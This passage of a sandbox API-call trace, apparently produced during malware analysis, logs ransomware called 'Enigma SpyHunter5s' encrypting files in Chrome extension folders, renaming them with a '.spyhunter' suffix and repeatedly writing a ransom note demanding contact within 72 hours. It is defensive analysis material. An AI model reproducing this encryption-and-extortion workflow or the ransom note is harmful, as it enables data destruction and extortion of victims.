hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0159.011] GetProcessHeap () returned 0x2c0000 [0159.011] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f1f9e0 | out: hHeap=0x2c0000) returned 1 [0159.011] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57eaf8 | out: pbBuffer=0x57eaf8) returned 1 [0159.011] GetProcessHeap () returned 0x2c0000 [0159.011] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0159.011] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57eaf0*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57eaf0*=0x30) returned 1 [0159.011] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\angular.js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\angular.js"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0159.012] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\angular.js") returned 149 [0159.012] StrStrW (lpFirst="angular.js", lpSrch=".txt") returned 0x0 [0159.012] GetProcessHeap () returned 0x2c0000 [0159.012] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0159.012] ReadFile (in: hFile=0xa0, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57eab4, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x57eab4*=0x2800, lpOverlapped=0x0) returned 1 [0159.206] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0159.206] WriteFile (in: hFile=0xa0, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x57eab4, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x57eab4*=0x2800, lpOverlapped=0x0) returned 1 [0159.206] GetProcessHeap () returned 0x2c0000 [0159.206] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0159.206] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0159.206] WriteFile (in: hFile=0xa0, lpBuffer=0x57eaf4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57eab4, lpOverlapped=0x0 | out: lpBuffer=0x57eaf4*, lpNumberOfBytesWritten=0x57eab4*=0x4, lpOverlapped=0x0) returned 1 [0159.284] WriteFile (in: hFile=0xa0, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57eab4, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x57eab4*=0x30, lpOverlapped=0x0) returned 1 [0159.284] CloseHandle (hObject=0xa0) returned 1 [0159.284] GetProcessHeap () returned 0x2c0000 [0159.284] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0159.284] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\angular.js.spyhunter") returned 159 [0159.285] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\angular.js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\angular.js"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\angular.js.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\angular.js.spyhunter")) returned 1 [0159.286] GetProcessHeap () returned 0x2c0000 [0159.286] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0159.286] GetProcessHeap () returned 0x2c0000 [0159.286] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0159.286] GetProcessHeap () returned 0x2c0000 [0159.286] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fc7028 | out: hHeap=0x2c0000) returned 1 [0159.286] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0159.287] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0159.287] WriteFile (in: hFile=0xa0, lpBuffer=0x57ea27*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x57eb50, lpOverlapped=0x0 | out: lpBuffer=0x57ea27*, lpNumberOfBytesWritten=0x57eb50*=0x127, lpOverlapped=0x0) returned 1 [0159.288] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0159.288] WriteFile (in: hFile=0xa0, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x57eb50, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x57eb50*=0x2ac, lpOverlapped=0x0) returned 1 [0159.289] CloseHandle (hObject=0xa0) returned 1 [0159.289] GetProcessHeap () returned 0x2c0000 [0159.289] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f82370 | out: hHeap=0x2c0000) returned 1 [0159.289] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\zh_TW\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\zh_tw\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0159.290] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0159.290] WriteFile (in: hFile=0xa0, lpBuffer=0x57ea23*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x57eb4c, lpOverlapped=0x0 | out: lpBuffer=0x57ea23*, lpNumberOfBytesWritten=0x57eb4c*=0x127, lpOverlapped=0x0) returned 1 [0159.291] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0159.291] WriteFile (in: hFile=0xa0, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x57eb4c, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x57eb4c*=0x2ac, lpOverlapped=0x0) returned 1 [0159.292] CloseHandle (hObject=0xa0) returned 1 [0159.292] GetProcessHeap () returned 0x2c0000 [0159.292] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2d0fe40 | out: hHeap=0x2c0000) returned 1 [0159.292] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57eae8 | out: pbBuffer=0x57eae8) returned 1 [0159.292] GetProcessHeap () returned 0x2c0000 [0159.292] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0159.292] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57eae0*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57eae0*=0x30) returned 1 [0159.292] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\zh_TW\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\zh_tw\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0159.293] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\zh_TW\\messages.json") returned 162 [0159.293] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0159.293] GetProcessHeap () returned 0x2c0000 [0159.293] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0159.293] ReadFile (in: hFile=0xa0, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57eaa4, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x57eaa4*=0x280, lpOverlapped=0x0) returned 1 [0159.403] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xfffffd80, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0159.403] WriteFile (in: hFile=0xa0, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x280, lpNumberOfBytesWritten=0x57eaa4, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x57eaa4*=0x280, lpOverlapped=0x0) returned 1 [0159.403] GetProcessHeap () returned 0x2c0000 [0159.403] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0159.403] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0159.403] WriteFile (in: hFile=0xa0, lpBuffer=0x57eae4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57eaa4, lpOverlapped=0x0 | out: lpBuffer=0x57eae4*, lpNumberOfBytesWritten=0x57eaa4*=0x4, lpOverlapped=0x0) returned 1 [0159.403] WriteFile (in: hFile=0xa0, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57eaa4, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x57eaa4*=0x30, lpOverlapped=0x0) returned 1 [0159.404] CloseHandle (hObject=0xa0) returned 1 [0159.404] GetProcessHeap () returned 0x2c0000 [0159.404] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0159.404] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\zh_TW\\messages.json.spyhunter") returned 172 [0159.404] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\zh_TW\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\zh_tw\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\zh_TW\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\zh_tw\\messages.json.spyhunter")) returned 1 [0159.405] GetProcessHeap () returned 0x2c0000 [0159.405] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0159.405] GetProcessHeap () returned 0x2c0000 [0159.405] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0159.405] GetProcessHeap () returned 0x2c0000 [0159.405] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f07930 | out: hHeap=0x2c0000) returned 1 [0159.405] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sr\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sr\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0159.406] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0159.406] WriteFile (in: hFile=0xa0, lpBuffer=0x57ea1b*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x57eb44, lpOverlapped=0x0 | out: lpBuffer=0x57ea1b*, lpNumberOfBytesWritten=0x57eb44*=0x127, lpOverlapped=0x0) returned 1 [0159.407] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0159.407] WriteFile (in: hFile=0xa0, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x57eb44, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x57eb44*=0x2ac, lpOverlapped=0x0) returned 1 [0159.408] CloseHandle (hObject=0xa0) returned 1 [0159.408] GetProcessHeap () returned 0x2c0000 [0159.408] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f06e08 | out: hHeap=0x2c0000) returned 1 [0159.408] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57eae0 | out: pbBuffer=0x57eae0) returned 1 [0159.408] GetProcessHeap () returned 0x2c0000 [0159.408] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0159.408] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57ead8*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57ead8*=0x30) returned 1 [0159.408] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sr\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0159.409] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sr\\messages.json") returned 159 [0159.409] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0159.409] GetProcessHeap () returned 0x2c0000 [0159.409] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0159.409] ReadFile (in: hFile=0xa0, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57ea9c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x57ea9c*=0x32c, lpOverlapped=0x0) returned 1 [0159.487] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xfffffcd4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0159.487] WriteFile (in: hFile=0xa0, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x32c, lpNumberOfBytesWritten=0x57ea9c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x57ea9c*=0x32c, lpOverlapped=0x0) returned 1 [0159.487] GetProcessHeap () returned 0x2c0000 [0159.487] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0159.487] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0159.488] WriteFile (in: hFile=0xa0, lpBuffer=0x57eadc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57ea9c, lpOverlapped=0x0 | out: lpBuffer=0x57eadc*, lpNumberOfBytesWritten=0x57ea9c*=0x4, lpOverlapped=0x0) returned 1 [0159.488] WriteFile (in: hFile=0xa0, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57ea9c, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x57ea9c*=0x30, lpOverlapped=0x0) returned 1 [0159.488] CloseHandle (hObject=0xa0) returned 1 [0159.488] GetProcessHeap () returned 0x2c0000 [0159.488] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0159.488] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sr\\messages.json.spyhunter") returned 169 [0159.488] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sr\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sr\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sr\\messages.json.spyhunter")) returned 1 [0159.489] GetProcessHeap () returned 0x2c0000 [0159.489] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0159.489] GetProcessHeap () returned 0x2c0000 [0159.489] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0159.489] GetProcessHeap () returned 0x2c0000 [0159.490] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f81a40 | out: hHeap=0x2c0000) returned 1 [0159.490] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ro\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ro\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0159.491] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0159.491] WriteFile (in: hFile=0xa0, lpBuffer=0x57ea13*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x57eb3c, lpOverlapped=0x0 | out: lpBuffer=0x57ea13*, lpNumberOfBytesWritten=0x57eb3c*=0x127, lpOverlapped=0x0) returned 1 [0159.492] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0159.492] WriteFile (in: hFile=0xa0, lpBuffer=0x2d7a90*, 